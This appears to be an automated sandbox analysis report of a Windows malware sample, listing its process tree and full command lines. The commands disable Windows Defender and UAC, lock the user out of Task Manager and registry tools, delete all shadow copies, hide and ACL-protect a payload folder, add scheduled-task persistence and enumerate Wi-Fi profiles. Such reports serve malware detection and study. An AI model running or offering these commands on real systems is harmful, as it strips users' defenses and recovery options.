Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4744 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Users\Admin\AppData\Local\Temp\final.exe
PID 4744 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Users\Admin\AppData\Local\Temp\final.exe
PID 4368 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 2696 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2696 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4368 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4368 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2224 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2224 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3316 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3316 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4904 wrote to memory of 3384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4904 wrote to memory of 3384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4380 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4380 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4380 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4380 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4572 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4572 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4368 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4108 wrote to memory of 416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4108 wrote to memory of 416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4644 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4644 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4368 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4020 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4020 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1456 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1456 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4380 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\$Sys-Manager\systemservice92.exe
PID 4380 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\$Sys-Manager\systemservice92.exe
PID 4368 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4380 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4380 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4368 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4876 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4876 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4972 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4368 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4760 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4760 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4380 wrote to memory of 5320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4380 wrote to memory of 5320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

System policy modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStore = "1" C:\$Sys-Manager\systemservice92.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\final.exe

"C:\Users\Admin\AppData\Local\Temp\final.exe"

C:\Users\Admin\AppData\Local\Temp\final.exe

"C:\Users\Admin\AppData\Local\Temp\final.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\$Sys-Manager\systemservice.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice92.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice.bat""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager""

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /tn servicebat /tr C:\$Sys-Manager\systemservice.bat /sc onstart /f

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\systemservice.bat"

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"

C:\$Sys-Manager\systemservice92.exe

"C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)"

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\desktop.ini""

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\desktop.ini"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\$Sys-Manager\systemservice92.exe

"C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"

C:\Windows\SYSTEM32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.exe'"

C:\Windows\SYSTEM32\netsh.exe

netsh wlan show profiles

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.bat'"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.vbs'"

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.py'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.pyw'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo Y | winget list"

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y "

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /f /im firefox.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /f /im firefox.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users" /grant %username%:F"

C:\Windows\system32\icacls.exe

icacls "C:\Users" /grant Admin:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)"

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f C:\Windows\System32\drivers\etc\hosts

C:\Windows\SYSTEM32\setx.exe

setx PATH "C:\$Sys-Manager;C:\Users\Admin\AppData\Local\Temp\_MEI1122\pywin32_system32;C:\Users\Admin\AppData\Local\Temp\_MEI47442\pywin32_system32;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f"

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\reg.exe

reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Checkpoint-Computer -Description \"Windows Update\" -RestorePointType \"MODIFY_SETTINGS\""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo %COMPUTERNAME%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo %USERNAME%"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show interfaces"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\netsh.exe

netsh wlan show interfaces

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

